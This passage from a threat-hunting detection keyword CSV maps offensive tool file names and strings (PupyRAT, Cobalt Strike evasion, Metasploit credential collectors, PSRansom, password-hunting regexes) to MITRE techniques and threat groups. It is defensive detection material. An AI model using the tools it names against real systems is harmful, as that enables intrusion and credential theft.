- T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55818" "*pupy/payload_*",".{0,1000}pupy\/payload_.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - 
T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55819" "*pupy/pupy/external/BeRoot*",".{0,1000}pupy\/pupy\/external\/BeRoot.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55820" "*PupyCmdLoop*",".{0,1000}PupyCmdLoop.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - 
T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55821" "*PupyCredentials.py*",".{0,1000}PupyCredentials\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55822" "*PupyDnsCnc.py*",".{0,1000}PupyDnsCnc\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting 
Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55823" "*PupyDnsCommandServerHandler*",".{0,1000}PupyDnsCommandServerHandler.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55824" "*pupygen.py *",".{0,1000}pupygen\.py\s.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55825" "*PupyKCPSocketStream*",".{0,1000}PupyKCPSocketStream.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and 
post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55826" "*pupylib.payloads.ps1*",".{0,1000}pupylib\.payloads\.ps1.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55827" "*PupyLoaderTemplate.*",".{0,1000}PupyLoaderTemplate\..{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - 
T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55828" "*PupyOffloadDNS*",".{0,1000}PupyOffloadDNS.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55829" "*PupyOffloadSocket*",".{0,1000}PupyOffloadSocket.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - 
TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55830" "*PupySocketStream.py*",".{0,1000}PupySocketStream\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55831" "*PupyVirtualStream.py*",".{0,1000}PupyVirtualStream\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55832" 
"*pureqh/bypassAV*",".{0,1000}pureqh\/bypassAV.{0,1000}","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/pureqh/bypassAV","1","1","N/A","N/A","10","10","455","98","2021-05-18T05:03:03Z","2021-02-25T05:26:11Z","55833" "*purevpn_cred_collector.*",".{0,1000}purevpn_cred_collector\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","55834" "*purplepanda.py*",".{0,1000}purplepanda\.py.{0,1000}","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. 
Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","N/A","7","687","83","2025-04-14T16:23:50Z","2022-01-01T12:10:40Z","55835" "*purplepanda_config.py*",".{0,1000}purplepanda_config\.py.{0,1000}","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","N/A","7","687","83","2025-04-14T16:23:50Z","2022-01-01T12:10:40Z","55836" "*purplepanda_github.py*",".{0,1000}purplepanda_github\.py.{0,1000}","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","N/A","7","687","83","2025-04-14T16:23:50Z","2022-01-01T12:10:40Z","55837" "*PURPLEPANDA_NEO4J_URL=*",".{0,1000}PURPLEPANDA_NEO4J_URL\=.{0,1000}","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. 
Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","N/A","7","687","83","2025-04-14T16:23:50Z","2022-01-01T12:10:40Z","55838" "*purplepanda_prints.py*",".{0,1000}purplepanda_prints\.py.{0,1000}","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","N/A","7","687","83","2025-04-14T16:23:50Z","2022-01-01T12:10:40Z","55839" "*PURPLEPANDA_PWD=*",".{0,1000}PURPLEPANDA_PWD\=.{0,1000}","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","N/A","7","687","83","2025-04-14T16:23:50Z","2022-01-01T12:10:40Z","55840" "*PurpleSharp.exe*",".{0,1000}PurpleSharp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","55841" "*PurpleSharp.Lib.IPAddressRange*",".{0,1000}PurpleSharp\.Lib\.IPAddressRange.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#content","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","55842" "*PUSH_CONNECTION_OUTSIDESPECULA*",".{0,1000}PUSH_CONNECTION_OUTSIDESPECULA.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","55843" "*putterpanda_whoami*",".{0,1000}putterpanda_whoami.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation 
tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","55844" "*puttygen.exe FUZZ*",".{0,1000}puttygen\.exe\sFUZZ.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tool","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","7","1","68","9","2024-09-15T22:43:02Z","2021-09-17T14:40:07Z","55845" "*putty-infected.exe*",".{0,1000}putty\-infected\.exe.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","55846" "*puzzlepeaches/NTLMRecon*",".{0,1000}puzzlepeaches\/NTLMRecon.{0,1000}","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","1","N/A","N/A","8","1","35","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z","55847" "*pwcrack initdb*",".{0,1000}pwcrack\sinitdb.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","55848" "*pwcrack updatedb*",".{0,1000}pwcrack\supdatedb.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential 
Access","https://github.com/L-codes/pwcrack-framework","1","0","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","55849" "*PWCrack*",".{0,1000}PWCrack.{0,1000}","offensive_tool_keyword","PWCrack","cracking tool for multiple hash type","T1110 - T1111 - T1210 - T1558.002 - T1555","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","N/A","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","55850" "*pwd*/*/rules/best64.rule*",".{0,1000}pwd.{0,1000}\/.{0,1000}\/rules\/best64\.rule.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Crack the hash with Hashcat","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55853" "*pwd/C2Files/*",".{0,1000}pwd\/C2Files\/.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","0","N/A","N/A","9","5","478","116","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z","55854" "*pwd\C2Files\*",".{0,1000}pwd\\C2Files\\.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. 
you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","0","N/A","N/A","9","5","478","116","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z","55855" "*pwd_dump *",".{0,1000}pwd_dump\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","55856" "*pwd|creds|cred|secret|userpw*",".{0,1000}pwd\|creds\|cred\|secret\|userpw.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","N/A","7","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","55857" "*pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass|pass*",".{0,1000}pwd\|passwd\|password\|PASSWD\|PASSWORD\|dbuser\|dbpass\|pass.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","55858" "*pwd+c5eeCXJF7Mxr3qeKtaTa2727SSpvYnGD2ptzGMnNO0iye*",".{0,1000}pwd\+c5eeCXJF7Mxr3qeKtaTa2727SSpvYnGD2ptzGMnNO0iye.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - 
T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","N/A","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","55859" "*PwDLwAGAAkELwAGAK8ALwAOAE8FPgUGAG8FeQMGAK0ChwUOAC0FSAQOAMsASAQGABAFeQMAAAAAHAAAAAAAAQABAAAAEABxAxIDQQABAAEAUCAAAAAAkQA5ALQAAQDsIAAAAACRAOQD*",".{0,1000}PwDLwAGAAkELwAGAK8ALwAOAE8FPgUGAG8FeQMGAK0ChwUOAC0FSAQOAMsASAQGABAFeQMAAAAAHAAAAAAAAQABAAAAEABxAxIDQQABAAEAUCAAAAAAkQA5ALQAAQDsIAAAAACRAOQD.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#content","N/A","9","","N/A","","","","55863" "*pwdump -f 